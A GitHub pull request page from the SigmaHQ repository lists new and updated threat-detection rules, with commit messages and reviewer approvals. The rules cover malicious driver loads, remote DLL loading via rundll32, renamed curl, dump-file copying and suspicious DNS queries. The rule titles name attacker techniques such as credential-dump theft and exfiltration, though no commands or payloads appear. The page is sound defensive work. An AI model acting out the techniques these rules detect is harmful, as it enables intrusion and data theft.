Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Multiple Fixes & Enhancements #4427

Merged
merged 31 commits into from
Oct 4, 2023
Merged

Multiple Fixes & Enhancements #4427

merged 31 commits into from
Oct 4, 2023

Conversation

nasbench
Copy link
Member

@nasbench nasbench commented Sep 7, 2023
edited
Loading

Summary of the Pull Request

This PR introduces multiple updates and enhancements as well as new rules

Changelog

  • new: Application Terminated Via Wmic.EXE
  • new: Browser Execution In Headless Mode
  • new: Chromium Browser Headless Execution To Mockbin Like Site
  • new: DarkGate User Created Via Net.EXE
  • new: DMP/HDMP File Creation
  • new: Malicious Driver Load
  • new: Malicious Driver Load By Name
  • new: Potentially Suspicious DMP/HDMP File Creation
  • new: Remote DLL Load Via Rundll32.EXE
  • new: Renamed CURL.EXE Execution
  • new: Vulnerable Driver Load
  • new: Vulnerable Driver Load By Name
  • update: 7Zip Compressing Dump Files - Increase coverage
  • update: Amsi.DLL Loaded Via LOLBIN Process - Reduce level to medium
  • update: COM Hijack via Sdclt - Fix Logic
  • update: Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE - Increase coverage
  • update: Creation of an Executable by an Executable - Fix FP
  • update: DLL Load By System Process From Suspicious Locations - Reduce level to medium
  • update: DNS Query Request By Regsvr32.EXE - Reduce level to medium
  • update: DNS Query To MEGA Hosting Website - DNS Client - Update title and reduce level to medium
  • update: DNS Query To MEGA Hosting Website - Reduce level to low and update metadata
  • update: DNS Query To Remote Access Software Domain From Non-Browser App - Increase coverage with new domains
  • update: DNS Query To Ufile.io - DNS Client - Update title and reduce level to low
  • update: DNS Query To Ufile.io - Update title and reduce level to low
  • update: DNS Query Tor .Onion Address - Sysmon - Update title
  • update: DNS Server Discovery Via LDAP Query - Reduce level to low and update FP filters
  • update: DriverQuery.EXE Execution - Increase coverage
  • update: File Download From Browser Process Via Inline Link
  • update: Greedy File Deletion Using Del - Increase coverage
  • update: Leviathan Registry Key Activity - Fix logic
  • update: Network Connection Initiated By Regsvr32.EXE - Reduce level to medium and metadata update
  • update: Non Interactive PowerShell Process Spawned - Increase coverage
  • update: OceanLotus Registry Activity - Fix Logic
  • update: Office Application Startup - Office Test - Fix Logic
  • update: OneNote Attachment File Dropped In Suspicious Location - Fix FP
  • update: Potential Dead Drop Resolvers - Increase coverage with new domains
  • update: Potential Persistence Via COM Hijacking From Suspicious Locations - Increase coverage and fix logic
  • update: Potential Persistence Via COM Search Order Hijacking - Fix Logic
  • update: Potential Process Hollowing Activity - Update FP filters
  • update: Potential Recon Activity Using DriverQuery.EXE - Increase coverage
  • update: Potential Unquoted Service Path Reconnaissance Via Wmic.EXE - Reduce level to medium
  • update: Potentially Suspicious Event Viewer Child Process - Update metadata
  • update: PowerShell Initiated Network Connection - Update description
  • update: PowerShell Module File Created By Non-PowerShell Process - Fix FP
  • update: PsExec Tool Execution From Suspicious Locations - PipeName - Reduce level to medium
  • update: Python Image Load By Non-Python Process - Update description and title
  • update: Python Initiated Connection - Update FP filter
  • update: Remote Thread Creation By Uncommon Source Image - Update FP filter
  • update: Renamed AutoIt Execution - Increase coverage
  • update: Suspicious Chromium Browser Instance Executed With Custom Extensions - Increase coverage
  • update: Suspicious WebDav Client Execution Via Rundll32.EXE - New Title
  • update: Sysinternals Tools AppX Versions Execution - Reduce level to low
  • update: Sysmon Blocked Executable - Update logsource
  • update: UAC Bypass via Event Viewer - Fix Logic
  • update: UNC2452 Process Creation Patterns - Fix logic
  • update: Usage Of Malicious POORTRY Signed Driver - Deprecated
  • update: Vulnerable AVAST Anti Rootkit Driver Load - Deprecated
  • update: Vulnerable Dell BIOS Update Driver Load - Deprecated
  • update: Vulnerable Driver Load By Name - Deprecated
  • update: Vulnerable GIGABYTE Driver Load - Deprecated
  • update: Vulnerable HW Driver Load - Deprecated
  • update: Vulnerable Lenovo Driver Load - Deprecated
  • update: WebDav Client Execution Via Rundll32.EXE
  • update: Windows Update Error - Reduce level to informational and status to stable
  • update: Winrar Compressing Dump Files - Increase Coverage

Example Log Event

N/A

Fixed Issues

SigmaHQ Rule Creation Conventions

  • If your PR adds new rules, please consider following and applying these conventions

@nasbench
fix: fp found in testing
d5f55d2
@nasbench
chore: fix fp and move rules
2fa57a3
@nasbench
chore: update metadata
276cd6b
@nasbench
Create file_event_win_dump_file_creation.yml
c9b79fa
@nasbench
feat: update loldrivers rules
8326538
@nasbench
fix: closes SigmaHQ#4437
e9ffe92 
- Some MSI installers might trigger a "rundll32.exe" execution that spawns "cmd.exe" often with no ".dll" extension. Hence why ".dll" extension was added to the rundll32/cmd selection.
@nasbench
fix: closes SigmaHQ#4438
01d6414 
- This commit adds coverage for `dwservice.net` as suggested in issue SigmaHQ#4438
- Sorts the list of tlds
- Removes leading dots to avoid missing coverage
@nasbench
Update dns_query_win_remote_access_software_domains_non_browsers.yml
022907b 
- Add more browsers filters
@nasbench
fix: update filters for dead drop resolvers rule
b77e9d2
@nasbench
Merge branch 'master' into service-creation-update
8c488b6
@nasbench
feat: updates & move
0f1d19d
@nasbench
Merge branch 'SigmaHQ:master' into service-creation-update
bdd86ab
@nasbench
feat: update sysmon rules and mapping
6a7c631
@nasbench
feat: multiple updates and fixes
9f5f7e2
@nasbench nasbench mentioned this pull request Sep 28, 2023
Closed
@nasbench nasbench mentioned this pull request Sep 29, 2023
Closed
@nasbench nasbench requested a review from phantinuss September 29, 2023 11:51
@nasbench nasbench marked this pull request as ready for review September 29, 2023 11:51
phantinuss
phantinuss reviewed Oct 2, 2023
View reviewed changes
rules/windows/builtin/dns_client/win_dns_client_ufile_io.yml Outdated Show resolved Hide resolved
...iltin/system/microsoft_windows_windows_update_client/win_system_susp_system_update_error.yml Outdated Show resolved Hide resolved
rules/windows/dns_query/dns_query_win_dns_server_discovery_via_ldap_query.yml Outdated Show resolved Hide resolved
rules/windows/dns_query/dns_query_win_dns_server_discovery_via_ldap_query.yml Outdated Show resolved Hide resolved
rules/windows/dns_query/dns_query_win_teamviewer_domain_query_by_uncommon_app.yml Outdated Show resolved Hide resolved
rules/windows/process_creation/proc_creation_win_browsers_inline_file_download.yml Outdated Show resolved Hide resolved
rules/windows/process_creation/proc_creation_win_eventvwr_susp_child_process.yml Outdated Show resolved Hide resolved
rules/windows/process_creation/proc_creation_win_rundll32_webdav_client_execution.yml Outdated Show resolved Hide resolved
rules/windows/process_creation/proc_creation_win_rundll32_webdav_client_execution.yml Outdated Show resolved Hide resolved
rules/windows/sysmon/sysmon_file_block_executable.yml Outdated Show resolved Hide resolved
phantinuss and others added 5 commits October 2, 2023 11:20
nasbench and others added 2 commits October 4, 2023 11:18
@nasbench @phantinuss
Update rules/windows/process_creation/proc_creation_win_browsers_inli…
89db082 
…ne_file_download.yml

Co-authored-by: phantinuss <79651203+phantinuss@users.noreply.github.com>
@nasbench @phantinuss
Update rules/windows/process_creation/proc_creation_win_browsers_chro…
6777607 
…mium_mockbin_abuse.yml

Co-authored-by: phantinuss <79651203+phantinuss@users.noreply.github.com>
frack113
frack113 approved these changes Oct 4, 2023
View reviewed changes
Copy link
Member

@frack113 frack113 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

LGTM

@nasbench nasbench changed the title Service Creation Rules Update Multiple Fixes & Enhancements Oct 4, 2023
@nasbench nasbench merged commit e230acd into SigmaHQ:master Oct 4, 2023
10 checks passed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@phantinuss phantinuss phantinuss left review comments

@frack113 frack113 frack113 approved these changes

Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
3 participants
@nasbench @frack113 @phantinuss